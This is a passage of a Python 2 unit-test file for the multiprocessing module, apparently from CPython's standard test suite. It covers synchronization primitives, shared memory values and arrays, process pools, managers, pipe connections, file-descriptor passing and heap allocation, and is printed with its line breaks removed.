self.assertEqual(lock.release(), None) self.assertEqual(lock.release(), None) self.assertEqual(lock.release(), None) self.assertRaises((AssertionError, RuntimeError), lock.release) def test_lock_context(self): with self.Lock(): pass class _TestSemaphore(BaseTestCase): def _test_semaphore(self, sem): self.assertReturnsIfImplemented(2, get_value, sem) self.assertEqual(sem.acquire(), True) self.assertReturnsIfImplemented(1, get_value, sem) self.assertEqual(sem.acquire(), True) self.assertReturnsIfImplemented(0, get_value, sem) self.assertEqual(sem.acquire(False), False) self.assertReturnsIfImplemented(0, get_value, sem) self.assertEqual(sem.release(), None) self.assertReturnsIfImplemented(1, get_value, sem) self.assertEqual(sem.release(), None) self.assertReturnsIfImplemented(2, get_value, sem) def test_semaphore(self): sem = self.Semaphore(2) self._test_semaphore(sem) self.assertEqual(sem.release(), None) self.assertReturnsIfImplemented(3, get_value, sem) self.assertEqual(sem.release(), None) self.assertReturnsIfImplemented(4, get_value, sem) def test_bounded_semaphore(self): sem = self.BoundedSemaphore(2) self._test_semaphore(sem) # Currently fails on OS/X #if HAVE_GETVALUE: # self.assertRaises(ValueError, sem.release) # self.assertReturnsIfImplemented(2, get_value, sem) def test_timeout(self): if self.TYPE != 'processes': return sem = self.Semaphore(0) acquire = TimingWrapper(sem.acquire) self.assertEqual(acquire(False), False) self.assertTimingAlmostEqual(acquire.elapsed, 0.0) self.assertEqual(acquire(False, None), False) self.assertTimingAlmostEqual(acquire.elapsed, 0.0) self.assertEqual(acquire(False, TIMEOUT1), False) self.assertTimingAlmostEqual(acquire.elapsed, 0) self.assertEqual(acquire(True, TIMEOUT2), False) self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2) self.assertEqual(acquire(timeout=TIMEOUT3), False) self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3) class _TestCondition(BaseTestCase): @classmethod def f(cls, cond, sleeping, woken, timeout=None): cond.acquire() sleeping.release() cond.wait(timeout) woken.release() cond.release() def check_invariant(self, cond): # this is only supposed to succeed when there are no sleepers if self.TYPE == 'processes': try: sleepers = (cond._sleeping_count.get_value() - cond._woken_count.get_value()) self.assertEqual(sleepers, 0) self.assertEqual(cond._wait_semaphore.get_value(), 0) except NotImplementedError: pass def test_notify(self): cond = self.Condition() sleeping = self.Semaphore(0) woken = self.Semaphore(0) p = self.Process(target=self.f, args=(cond, sleeping, woken)) p.daemon = True p.start() p = threading.Thread(target=self.f, args=(cond, sleeping, woken)) p.daemon = True p.start() # wait for both children to start sleeping sleeping.acquire() sleeping.acquire() # check no process/thread has woken up time.sleep(DELTA) self.assertReturnsIfImplemented(0, get_value, woken) # wake up one process/thread cond.acquire() cond.notify() cond.release() # check one process/thread has woken up time.sleep(DELTA) self.assertReturnsIfImplemented(1, get_value, woken) # wake up another cond.acquire() cond.notify() cond.release() # check other has woken up time.sleep(DELTA) self.assertReturnsIfImplemented(2, get_value, woken) # check state is not mucked up self.check_invariant(cond) p.join() def test_notify_all(self): cond = self.Condition() sleeping = self.Semaphore(0) woken = self.Semaphore(0) # start some threads/processes which will timeout for i in range(3): p = self.Process(target=self.f, args=(cond, sleeping, woken, TIMEOUT1)) p.daemon = True p.start() t = threading.Thread(target=self.f, args=(cond, sleeping, woken, TIMEOUT1)) t.daemon = True t.start() # wait for them all to sleep for i in xrange(6): sleeping.acquire() # check they have all timed out for i in xrange(6): woken.acquire() self.assertReturnsIfImplemented(0, get_value, woken) # check state is not mucked up self.check_invariant(cond) # start some more threads/processes for i in range(3): p = self.Process(target=self.f, args=(cond, sleeping, woken)) p.daemon = True p.start() t = threading.Thread(target=self.f, args=(cond, sleeping, woken)) t.daemon = True t.start() # wait for them to all sleep for i in xrange(6): sleeping.acquire() # check no process/thread has woken up time.sleep(DELTA) self.assertReturnsIfImplemented(0, get_value, woken) # wake them all up cond.acquire() cond.notify_all() cond.release() # check they have all woken time.sleep(DELTA) self.assertReturnsIfImplemented(6, get_value, woken) # check state is not mucked up self.check_invariant(cond) def test_timeout(self): cond = self.Condition() wait = TimingWrapper(cond.wait) cond.acquire() res = wait(TIMEOUT1) cond.release() self.assertEqual(res, None) self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1) class _TestEvent(BaseTestCase): @classmethod def _test_event(cls, event): time.sleep(TIMEOUT2) event.set() def test_event(self): event = self.Event() wait = TimingWrapper(event.wait) # Removed temporarily, due to API shear, this does not # work with threading._Event objects. is_set == isSet self.assertEqual(event.is_set(), False) # Removed, threading.Event.wait() will return the value of the __flag # instead of None. API Shear with the semaphore backed mp.Event self.assertEqual(wait(0.0), False) self.assertTimingAlmostEqual(wait.elapsed, 0.0) self.assertEqual(wait(TIMEOUT1), False) self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1) event.set() # See note above on the API differences self.assertEqual(event.is_set(), True) self.assertEqual(wait(), True) self.assertTimingAlmostEqual(wait.elapsed, 0.0) self.assertEqual(wait(TIMEOUT1), True) self.assertTimingAlmostEqual(wait.elapsed, 0.0) # self.assertEqual(event.is_set(), True) event.clear() #self.assertEqual(event.is_set(), False) p = self.Process(target=self._test_event, args=(event,)) p.daemon = True p.start() self.assertEqual(wait(), True) # # # class _TestValue(BaseTestCase): ALLOWED_TYPES = ('processes',) codes_values = [ ('i', 4343, 24234), ('d', 3.625, -4.25), ('h', -232, 234), ('c', latin('x'), latin('y')) ] def setUp(self): if not HAS_SHAREDCTYPES: self.skipTest("requires multiprocessing.sharedctypes") @classmethod def _test(cls, values): for sv, cv in zip(values, cls.codes_values): sv.value = cv[2] def test_value(self, raw=False): if raw: values = [self.RawValue(code, value) for code, value, _ in self.codes_values] else: values = [self.Value(code, value) for code, value, _ in self.codes_values] for sv, cv in zip(values, self.codes_values): self.assertEqual(sv.value, cv[1]) proc = self.Process(target=self._test, args=(values,)) proc.daemon = True proc.start() proc.join() for sv, cv in zip(values, self.codes_values): self.assertEqual(sv.value, cv[2]) def test_rawvalue(self): self.test_value(raw=True) def test_getobj_getlock(self): val1 = self.Value('i', 5) lock1 = val1.get_lock() obj1 = val1.get_obj() val2 = self.Value('i', 5, lock=None) lock2 = val2.get_lock() obj2 = val2.get_obj() lock = self.Lock() val3 = self.Value('i', 5, lock=lock) lock3 = val3.get_lock() obj3 = val3.get_obj() self.assertEqual(lock, lock3) arr4 = self.Value('i', 5, lock=False) self.assertFalse(hasattr(arr4, 'get_lock')) self.assertFalse(hasattr(arr4, 'get_obj')) self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue') arr5 = self.RawValue('i', 5) self.assertFalse(hasattr(arr5, 'get_lock')) self.assertFalse(hasattr(arr5, 'get_obj')) class _TestArray(BaseTestCase): ALLOWED_TYPES = ('processes',) @classmethod def f(cls, seq): for i in range(1, len(seq)): seq[i] += seq[i-1] @unittest.skipIf(c_int is None, "requires _ctypes") def test_array(self, raw=False): seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831] if raw: arr = self.RawArray('i', seq) else: arr = self.Array('i', seq) self.assertEqual(len(arr), len(seq)) self.assertEqual(arr[3], seq[3]) self.assertEqual(list(arr[2:7]), list(seq[2:7])) arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4]) self.assertEqual(list(arr[:]), seq) self.f(seq) p = self.Process(target=self.f, args=(arr,)) p.daemon = True p.start() p.join() self.assertEqual(list(arr[:]), seq) @unittest.skipIf(c_int is None, "requires _ctypes") def test_array_from_size(self): size = 10 # Test for zeroing (see issue #11675). # The repetition below strengthens the test by increasing the chances # of previously allocated non-zero memory being used for the new array # on the 2nd and 3rd loops. for _ in range(3): arr = self.Array('i', size) self.assertEqual(len(arr), size) self.assertEqual(list(arr), [0] * size) arr[:] = range(10) self.assertEqual(list(arr), range(10)) del arr @unittest.skipIf(c_int is None, "requires _ctypes") def test_rawarray(self): self.test_array(raw=True) @unittest.skipIf(c_int is None, "requires _ctypes") def test_array_accepts_long(self): arr = self.Array('i', 10L) self.assertEqual(len(arr), 10) raw_arr = self.RawArray('i', 10L) self.assertEqual(len(raw_arr), 10) @unittest.skipIf(c_int is None, "requires _ctypes") def test_getobj_getlock_obj(self): arr1 = self.Array('i', range(10)) lock1 = arr1.get_lock() obj1 = arr1.get_obj() arr2 = self.Array('i', range(10), lock=None) lock2 = arr2.get_lock() obj2 = arr2.get_obj() lock = self.Lock() arr3 = self.Array('i', range(10), lock=lock) lock3 = arr3.get_lock() obj3 = arr3.get_obj() self.assertEqual(lock, lock3) arr4 = self.Array('i', range(10), lock=False) self.assertFalse(hasattr(arr4, 'get_lock')) self.assertFalse(hasattr(arr4, 'get_obj')) self.assertRaises(AttributeError, self.Array, 'i', range(10), lock='notalock') arr5 = self.RawArray('i', range(10)) self.assertFalse(hasattr(arr5, 'get_lock')) self.assertFalse(hasattr(arr5, 'get_obj')) # # # class _TestContainers(BaseTestCase): ALLOWED_TYPES = ('manager',) def test_list(self): a = self.list(range(10)) self.assertEqual(a[:], range(10)) b = self.list() self.assertEqual(b[:], []) b.extend(range(5)) self.assertEqual(b[:], range(5)) self.assertEqual(b[2], 2) self.assertEqual(b[2:10], [2,3,4]) b *= 2 self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]) self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6]) self.assertEqual(a[:], range(10)) d = [a, b] e = self.list(d) self.assertEqual( e[:], [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]] ) f = self.list([a]) a.append('hello') self.assertEqual(f[:], [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello']]) def test_dict(self): d = self.dict() indices = range(65, 70) for i in indices: d[i] = chr(i) self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices)) self.assertEqual(sorted(d.keys()), indices) self.assertEqual(sorted(d.values()), [chr(i) for i in indices]) self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices]) def test_namespace(self): n = self.Namespace() n.name = 'Bob' n.job = 'Builder' n._hidden = 'hidden' self.assertEqual((n.name, n.job), ('Bob', 'Builder')) del n.job self.assertEqual(str(n), "Namespace(name='Bob')") self.assertTrue(hasattr(n, 'name')) self.assertTrue(not hasattr(n, 'job')) # # # def sqr(x, wait=0.0): time.sleep(wait) return x*x class _TestPool(BaseTestCase): def test_apply(self): papply = self.pool.apply self.assertEqual(papply(sqr, (5,)), sqr(5)) self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3)) def test_map(self): pmap = self.pool.map self.assertEqual(pmap(sqr, range(10)), map(sqr, range(10))) self.assertEqual(pmap(sqr, range(100), chunksize=20), map(sqr, range(100))) def test_map_chunksize(self): try: self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1) except multiprocessing.TimeoutError: self.fail("pool.map_async with chunksize stalled on null list") def test_async(self): res = self.pool.apply_async(sqr, (7, TIMEOUT1,)) get = TimingWrapper(res.get) self.assertEqual(get(), 49) self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1) def test_async_timeout(self): res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 0.2)) get = TimingWrapper(res.get) self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2) self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2) def test_imap(self): it = self.pool.imap(sqr, range(10)) self.assertEqual(list(it), map(sqr, range(10))) it = self.pool.imap(sqr, range(10)) for i in range(10): self.assertEqual(it.next(), i*i) self.assertRaises(StopIteration, it.next) it = self.pool.imap(sqr, range(1000), chunksize=100) for i in range(1000): self.assertEqual(it.next(), i*i) self.assertRaises(StopIteration, it.next) def test_imap_unordered(self): it = self.pool.imap_unordered(sqr, range(1000)) self.assertEqual(sorted(it), map(sqr, range(1000))) it = self.pool.imap_unordered(sqr, range(1000), chunksize=53) self.assertEqual(sorted(it), map(sqr, range(1000))) def test_make_pool(self): self.assertRaises(ValueError, multiprocessing.Pool, -1) self.assertRaises(ValueError, multiprocessing.Pool, 0) p = multiprocessing.Pool(3) self.assertEqual(3, len(p._pool)) p.close() p.join() def test_terminate(self): if self.TYPE == 'manager': # On Unix a forked process increfs each shared object to # which its parent process held a reference. If the # forked process gets terminated then there is likely to # be a reference leak. So to prevent # _TestZZZNumberOfObjects from failing we skip this test # when using a manager. return result = self.pool.map_async( time.sleep, [0.1 for i in range(10000)], chunksize=1 ) self.pool.terminate() join = TimingWrapper(self.pool.join) join() self.assertTrue(join.elapsed < 0.2) def test_empty_iterable(self): # See Issue 12157 p = self.Pool(1) self.assertEqual(p.map(sqr, []), []) self.assertEqual(list(p.imap(sqr, [])), []) self.assertEqual(list(p.imap_unordered(sqr, [])), []) self.assertEqual(p.map_async(sqr, []).get(), []) p.close() p.join() def unpickleable_result(): return lambda: 42 class _TestPoolWorkerErrors(BaseTestCase): ALLOWED_TYPES = ('processes', ) def test_unpickleable_result(self): from multiprocessing.pool import MaybeEncodingError p = multiprocessing.Pool(2) # Make sure we don't lose pool processes because of encoding errors. for iteration in range(20): res = p.apply_async(unpickleable_result) self.assertRaises(MaybeEncodingError, res.get) p.close() p.join() class _TestPoolWorkerLifetime(BaseTestCase): ALLOWED_TYPES = ('processes', ) def test_pool_worker_lifetime(self): p = multiprocessing.Pool(3, maxtasksperchild=10) self.assertEqual(3, len(p._pool)) origworkerpids = [w.pid for w in p._pool] # Run many tasks so each worker gets replaced (hopefully) results = [] for i in range(100): results.append(p.apply_async(sqr, (i, ))) # Fetch the results and verify we got the right answers, # also ensuring all the tasks have completed. for (j, res) in enumerate(results): self.assertEqual(res.get(), sqr(j)) # Refill the pool p._repopulate_pool() # Wait until all workers are alive # (countdown * DELTA = 5 seconds max startup process time) countdown = 50 while countdown and not all(w.is_alive() for w in p._pool): countdown -= 1 time.sleep(DELTA) finalworkerpids = [w.pid for w in p._pool] # All pids should be assigned. See issue #7805. self.assertNotIn(None, origworkerpids) self.assertNotIn(None, finalworkerpids) # Finally, check that the worker pids have changed self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids)) p.close() p.join() def test_pool_worker_lifetime_early_close(self): # Issue #10332: closing a pool whose workers have limited lifetimes # before all the tasks completed would make join() hang. p = multiprocessing.Pool(3, maxtasksperchild=1) results = [] for i in range(6): results.append(p.apply_async(sqr, (i, 0.3))) p.close() p.join() # check the results for (j, res) in enumerate(results): self.assertEqual(res.get(), sqr(j)) # # Test that manager has expected number of shared objects left # class _TestZZZNumberOfObjects(BaseTestCase): # Because test cases are sorted alphabetically, this one will get # run after all the other tests for the manager. It tests that # there have been no "reference leaks" for the manager's shared # objects. Note the comment in _TestPool.test_terminate(). ALLOWED_TYPES = ('manager',) def test_number_of_objects(self): EXPECTED_NUMBER = 1 # the pool object is still alive multiprocessing.active_children() # discard dead process objs gc.collect() # do garbage collection refs = self.manager._number_of_objects() debug_info = self.manager._debug_info() if refs != EXPECTED_NUMBER: print self.manager._debug_info() print debug_info self.assertEqual(refs, EXPECTED_NUMBER) # # Test of creating a customized manager class # from multiprocessing.managers import BaseManager, BaseProxy, RemoteError class FooBar(object): def f(self): return 'f()' def g(self): raise ValueError def _h(self): return '_h()' def baz(): for i in xrange(10): yield i*i class IteratorProxy(BaseProxy): _exposed_ = ('next', '__next__') def __iter__(self): return self def next(self): return self._callmethod('next') def __next__(self): return self._callmethod('__next__') class MyManager(BaseManager): pass MyManager.register('Foo', callable=FooBar) MyManager.register('Bar', callable=FooBar, exposed=('f', '_h')) MyManager.register('baz', callable=baz, proxytype=IteratorProxy) class _TestMyManager(BaseTestCase): ALLOWED_TYPES = ('manager',) def test_mymanager(self): manager = MyManager() manager.start() foo = manager.Foo() bar = manager.Bar() baz = manager.baz() foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)] bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)] self.assertEqual(foo_methods, ['f', 'g']) self.assertEqual(bar_methods, ['f', '_h']) self.assertEqual(foo.f(), 'f()') self.assertRaises(ValueError, foo.g) self.assertEqual(foo._callmethod('f'), 'f()') self.assertRaises(RemoteError, foo._callmethod, '_h') self.assertEqual(bar.f(), 'f()') self.assertEqual(bar._h(), '_h()') self.assertEqual(bar._callmethod('f'), 'f()') self.assertEqual(bar._callmethod('_h'), '_h()') self.assertEqual(list(baz), [i*i for i in range(10)]) manager.shutdown() # # Test of connecting to a remote server and using xmlrpclib for serialization # _queue = Queue.Queue() def get_queue(): return _queue class QueueManager(BaseManager): '''manager class used by server process''' QueueManager.register('get_queue', callable=get_queue) class QueueManager2(BaseManager): '''manager class which specifies the same interface as QueueManager''' QueueManager2.register('get_queue') SERIALIZER = 'xmlrpclib' class _TestRemoteManager(BaseTestCase): ALLOWED_TYPES = ('manager',) @classmethod def _putter(cls, address, authkey): manager = QueueManager2( address=address, authkey=authkey, serializer=SERIALIZER ) manager.connect() queue = manager.get_queue() queue.put(('hello world', None, True, 2.25)) def test_remote(self): authkey = os.urandom(32) manager = QueueManager( address=('localhost', 0), authkey=authkey, serializer=SERIALIZER ) manager.start() p = self.Process(target=self._putter, args=(manager.address, authkey)) p.daemon = True p.start() manager2 = QueueManager2( address=manager.address, authkey=authkey, serializer=SERIALIZER ) manager2.connect() queue = manager2.get_queue() # Note that xmlrpclib will deserialize object as a list not a tuple self.assertEqual(queue.get(), ['hello world', None, True, 2.25]) # Because we are using xmlrpclib for serialization instead of # pickle this will cause a serialization error. self.assertRaises(Exception, queue.put, time.sleep) # Make queue finalizer run before the server is stopped del queue manager.shutdown() class _TestManagerRestart(BaseTestCase): @classmethod def _putter(cls, address, authkey): manager = QueueManager( address=address, authkey=authkey, serializer=SERIALIZER) manager.connect() queue = manager.get_queue() queue.put('hello world') def test_rapid_restart(self): authkey = os.urandom(32) manager = QueueManager( address=('localhost', 0), authkey=authkey, serializer=SERIALIZER) srvr = manager.get_server() addr = srvr.address # Close the connection.Listener socket which gets opened as a part # of manager.get_server(). It's not needed for the test. srvr.listener.close() manager.start() p = self.Process(target=self._putter, args=(manager.address, authkey)) p.daemon = True p.start() queue = manager.get_queue() self.assertEqual(queue.get(), 'hello world') del queue manager.shutdown() manager = QueueManager( address=addr, authkey=authkey, serializer=SERIALIZER) manager.start() manager.shutdown() # # # SENTINEL = latin('') class _TestConnection(BaseTestCase): ALLOWED_TYPES = ('processes', 'threads') @classmethod def _echo(cls, conn): for msg in iter(conn.recv_bytes, SENTINEL): conn.send_bytes(msg) conn.close() def test_connection(self): conn, child_conn = self.Pipe() p = self.Process(target=self._echo, args=(child_conn,)) p.daemon = True p.start() seq = [1, 2.25, None] msg = latin('hello world') longmsg = msg * 10 arr = array.array('i', range(4)) if self.TYPE == 'processes': self.assertEqual(type(conn.fileno()), int) self.assertEqual(conn.send(seq), None) self.assertEqual(conn.recv(), seq) self.assertEqual(conn.send_bytes(msg), None) self.assertEqual(conn.recv_bytes(), msg) if self.TYPE == 'processes': buffer = array.array('i', [0]*10) expected = list(arr) + [0] * (10 - len(arr)) self.assertEqual(conn.send_bytes(arr), None) self.assertEqual(conn.recv_bytes_into(buffer), len(arr) * buffer.itemsize) self.assertEqual(list(buffer), expected) buffer = array.array('i', [0]*10) expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr)) self.assertEqual(conn.send_bytes(arr), None) self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize), len(arr) * buffer.itemsize) self.assertEqual(list(buffer), expected) buffer = bytearray(latin(' ' * 40)) self.assertEqual(conn.send_bytes(longmsg), None) try: res = conn.recv_bytes_into(buffer) except multiprocessing.BufferTooShort, e: self.assertEqual(e.args, (longmsg,)) else: self.fail('expected BufferTooShort, got %s' % res) poll = TimingWrapper(conn.poll) self.assertEqual(poll(), False) self.assertTimingAlmostEqual(poll.elapsed, 0) self.assertEqual(poll(TIMEOUT1), False) self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1) conn.send(None) time.sleep(.1) self.assertEqual(poll(TIMEOUT1), True) self.assertTimingAlmostEqual(poll.elapsed, 0) self.assertEqual(conn.recv(), None) really_big_msg = latin('X') * (1024 * 1024 * 16) # 16Mb conn.send_bytes(really_big_msg) self.assertEqual(conn.recv_bytes(), really_big_msg) conn.send_bytes(SENTINEL) # tell child to quit child_conn.close() if self.TYPE == 'processes': self.assertEqual(conn.readable, True) self.assertEqual(conn.writable, True) self.assertRaises(EOFError, conn.recv) self.assertRaises(EOFError, conn.recv_bytes) p.join() def test_duplex_false(self): reader, writer = self.Pipe(duplex=False) self.assertEqual(writer.send(1), None) self.assertEqual(reader.recv(), 1) if self.TYPE == 'processes': self.assertEqual(reader.readable, True) self.assertEqual(reader.writable, False) self.assertEqual(writer.readable, False) self.assertEqual(writer.writable, True) self.assertRaises(IOError, reader.send, 2) self.assertRaises(IOError, writer.recv) self.assertRaises(IOError, writer.poll) def test_spawn_close(self): # We test that a pipe connection can be closed by parent # process immediately after child is spawned. On Windows this # would have sometimes failed on old versions because # child_conn would be closed before the child got a chance to # duplicate it. conn, child_conn = self.Pipe() p = self.Process(target=self._echo, args=(child_conn,)) p.daemon = True p.start() child_conn.close() # this might complete before child initializes msg = latin('hello') conn.send_bytes(msg) self.assertEqual(conn.recv_bytes(), msg) conn.send_bytes(SENTINEL) conn.close() p.join() def test_sendbytes(self): if self.TYPE != 'processes': return msg = latin('abcdefghijklmnopqrstuvwxyz') a, b = self.Pipe() a.send_bytes(msg) self.assertEqual(b.recv_bytes(), msg) a.send_bytes(msg, 5) self.assertEqual(b.recv_bytes(), msg[5:]) a.send_bytes(msg, 7, 8) self.assertEqual(b.recv_bytes(), msg[7:7+8]) a.send_bytes(msg, 26) self.assertEqual(b.recv_bytes(), latin('')) a.send_bytes(msg, 26, 0) self.assertEqual(b.recv_bytes(), latin('')) self.assertRaises(ValueError, a.send_bytes, msg, 27) self.assertRaises(ValueError, a.send_bytes, msg, 22, 5) self.assertRaises(ValueError, a.send_bytes, msg, 26, 1) self.assertRaises(ValueError, a.send_bytes, msg, -1) self.assertRaises(ValueError, a.send_bytes, msg, 4, -1) @classmethod def _is_fd_assigned(cls, fd): try: os.fstat(fd) except OSError as e: if e.errno == errno.EBADF: return False raise else: return True @classmethod def _writefd(cls, conn, data, create_dummy_fds=False): if create_dummy_fds: for i in range(0, 256): if not cls._is_fd_assigned(i): os.dup2(conn.fileno(), i) fd = reduction.recv_handle(conn) if msvcrt: fd = msvcrt.open_osfhandle(fd, os.O_WRONLY) os.write(fd, data) os.close(fd) @unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction") def test_fd_transfer(self): if self.TYPE != 'processes': self.skipTest("only makes sense with processes") conn, child_conn = self.Pipe(duplex=True) p = self.Process(target=self._writefd, args=(child_conn, b"foo")) p.daemon = True p.start() with open(test_support.TESTFN, "wb") as f: fd = f.fileno() if msvcrt: fd = msvcrt.get_osfhandle(fd) reduction.send_handle(conn, fd, p.pid) p.join() with open(test_support.TESTFN, "rb") as f: self.assertEqual(f.read(), b"foo") @unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction") @unittest.skipIf(sys.platform == "win32", "test semantics don't make sense on Windows") @unittest.skipIf(MAXFD <= 256, "largest assignable fd number is too small") @unittest.skipUnless(hasattr(os, "dup2"), "test needs os.dup2()") def test_large_fd_transfer(self): # With fd > 256 (issue #11657) if self.TYPE != 'processes': self.skipTest("only makes sense with processes") conn, child_conn = self.Pipe(duplex=True) p = self.Process(target=self._writefd, args=(child_conn, b"bar", True)) p.daemon = True p.start() with open(test_support.TESTFN, "wb") as f: fd = f.fileno() for newfd in range(256, MAXFD): if not self._is_fd_assigned(newfd): break else: self.fail("could not find an unassigned large file descriptor") os.dup2(fd, newfd) try: reduction.send_handle(conn, newfd, p.pid) finally: os.close(newfd) p.join() with open(test_support.TESTFN, "rb") as f: self.assertEqual(f.read(), b"bar") @classmethod def _send_data_without_fd(self, conn): os.write(conn.fileno(), b"\0") @unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction") @unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows") def test_missing_fd_transfer(self): # Check that exception is raised when received data is not # accompanied by a file descriptor in ancillary data. if self.TYPE != 'processes': self.skipTest("only makes sense with processes") conn, child_conn = self.Pipe(duplex=True) p = self.Process(target=self._send_data_without_fd, args=(child_conn,)) p.daemon = True p.start() self.assertRaises(RuntimeError, reduction.recv_handle, conn) p.join() class _TestListenerClient(BaseTestCase): ALLOWED_TYPES = ('processes', 'threads') @classmethod def _test(cls, address): conn = cls.connection.Client(address) conn.send('hello') conn.close() def test_listener_client(self): for family in self.connection.families: l = self.connection.Listener(family=family) p = self.Process(target=self._test, args=(l.address,)) p.daemon = True p.start() conn = l.accept() self.assertEqual(conn.recv(), 'hello') p.join() l.close() def test_issue14725(self): l = self.connection.Listener() p = self.Process(target=self._test, args=(l.address,)) p.daemon = True p.start() time.sleep(1) # On Windows the client process should by now have connected, # written data and closed the pipe handle by now. This causes # ConnectNamdedPipe() to fail with ERROR_NO_DATA. See Issue # 14725. conn = l.accept() self.assertEqual(conn.recv(), 'hello') conn.close() p.join() l.close() # # Test of sending connection and socket objects between processes # """ class _TestPicklingConnections(BaseTestCase): ALLOWED_TYPES = ('processes',) def _listener(self, conn, families): for fam in families: l = self.connection.Listener(family=fam) conn.send(l.address) new_conn = l.accept() conn.send(new_conn) if self.TYPE == 'processes': l = socket.socket() l.bind(('localhost', 0)) conn.send(l.getsockname()) l.listen(1) new_conn, addr = l.accept() conn.send(new_conn) conn.recv() def _remote(self, conn): for (address, msg) in iter(conn.recv, None): client = self.connection.Client(address) client.send(msg.upper()) client.close() if self.TYPE == 'processes': address, msg = conn.recv() client = socket.socket() client.connect(address) client.sendall(msg.upper()) client.close() conn.close() def test_pickling(self): try: multiprocessing.allow_connection_pickling() except ImportError: return families = self.connection.families lconn, lconn0 = self.Pipe() lp = self.Process(target=self._listener, args=(lconn0, families)) lp.daemon = True lp.start() lconn0.close() rconn, rconn0 = self.Pipe() rp = self.Process(target=self._remote, args=(rconn0,)) rp.daemon = True rp.start() rconn0.close() for fam in families: msg = ('This connection uses family %s' % fam).encode('ascii') address = lconn.recv() rconn.send((address, msg)) new_conn = lconn.recv() self.assertEqual(new_conn.recv(), msg.upper()) rconn.send(None) if self.TYPE == 'processes': msg = latin('This connection uses a normal socket') address = lconn.recv() rconn.send((address, msg)) if hasattr(socket, 'fromfd'): new_conn = lconn.recv() self.assertEqual(new_conn.recv(100), msg.upper()) else: # XXX On Windows with Py2.6 need to backport fromfd() discard = lconn.recv_bytes() lconn.send(None) rconn.close() lconn.close() lp.join() rp.join() """ # # # class _TestHeap(BaseTestCase): ALLOWED_TYPES = ('processes',) def test_heap(self): iterations = 5000 maxblocks = 50 blocks = [] # create and destroy lots of blocks of different sizes for i in xrange(iterations): size = int(random.lognormvariate(0, 1) * 1000) b = multiprocessing.heap.BufferWrapper(size) blocks.append(b) if len(blocks) > maxblocks: i = random.randrange(maxblocks) del blocks[i] # get the heap object heap = multiprocessing.heap.BufferWrapper._heap # verify the state of the heap all = [] occupied = 0 heap._lock.acquire() self.addCleanup(heap._lock.release) for L in heap._len_to_seq.values(): for arena, start, stop in L: all.append((heap._arenas.index(arena), start, stop, stop-start, 'free')) for arena, start, stop in heap._allocated_blocks: all.append((heap._arenas.index(arena), start, stop, stop-start, 'occupied')) occupied += (stop-start) all.sort() for i in range(len(all)-1): (arena, start, stop) = all[i][:3] (narena, nstart, nstop) = all[i+1][:3] self.assertTrue((arena != narena and nstart == 0) or (stop == nstart)) def test_free_from_gc(self): # Check that freeing of blocks by the garbage collector doesn't deadlock # (issue #12352). # Make sure the GC is enabled, and set lower collection thresholds to # make collections more frequent (and increase the probability of # deadlock). if not gc.isenabled(): gc.enable() self.addCleanup(gc.disable) thresholds = gc.get_threshold() self.addCleanup(gc.set_threshold, *thresholds) gc.set_threshold(10) # perform numerous block allocations, with cyclic references to make # sure objects are collected asynchronously by the gc for i in range(5000): a = multiprocessing.heap.BufferWrapper(1) b = multiprocessing.heap.BufferWrapper(1) # circular references a.buddy = b b.buddy = a # # # class _Foo(Structure): _fields_ = [ ('x', c_int), ('y', c_double) ] class _TestSharedCTypes(BaseTestCase): ALLOWED_TYPES = ('processes',) def setUp(self): if not HAS_SHAREDCTYPES: self.skipTest("requires multiprocessing.sharedctypes") @classmethod def _double(cls, x, y, foo, arr, string): x.value *= 2 y.value *= 2 foo.x *= 2 foo.y *= 2 string.value *= 2 for i in range(len(arr)): arr[i] *= 2 def test_sharedctypes(self, lock=False): x = Value('i', 7, lock=lock) y = Value(c_double, 1.0/3.0, lock=lock) foo = Value(_Foo, 3, 2, lock=lock) arr = self.Array('d', range(10), lock=lock) string = self.Array('c', 20, lock=lock) string.value = latin('hello') p = self.Process(target=self._double, args=(x, y, foo, arr, string)) p.daemon = True p.start() p.join() self.assertEqual(x.value, 14) self.assertAlmostEqual(y.value, 2.0/3.0) self.assertEqual(foo.x, 6) self.assertAlmostEqual(foo.y, 4.0) for i in range(10): self.assertAlmostEqual(arr[i], i*2) self.assertEqual(string.value, latin('hellohello')) def test_synchronize(self): self.test_sharedctypes(lock=True) def test_copy(self): foo = _Foo(2, 5.0) bar = copy(foo) foo.x = 0 foo.y = 0 self.assertEqual(bar.x, 2) self.assertAlmostEqual(bar.y, 5.0) # # # class _TestFinalize(BaseTestCase): ALLOWED_TYPES = ('processes',) @classmethod def _test_finalize(cls, conn): class Foo(object): pass a = Foo() util.Finalize(a, conn.send, args=('a',)) del a # triggers callback for a b = Foo() close_b = util.Finalize(b, conn.send, args=('b',)) close_b() # triggers callback for b close_b() # does nothing because callback has already been called del b # does nothing because callback has already been called c = Foo() util.Finalize(c, conn.send, args=('c',)) d10 = Foo() util.Finalize(d10, conn.send, 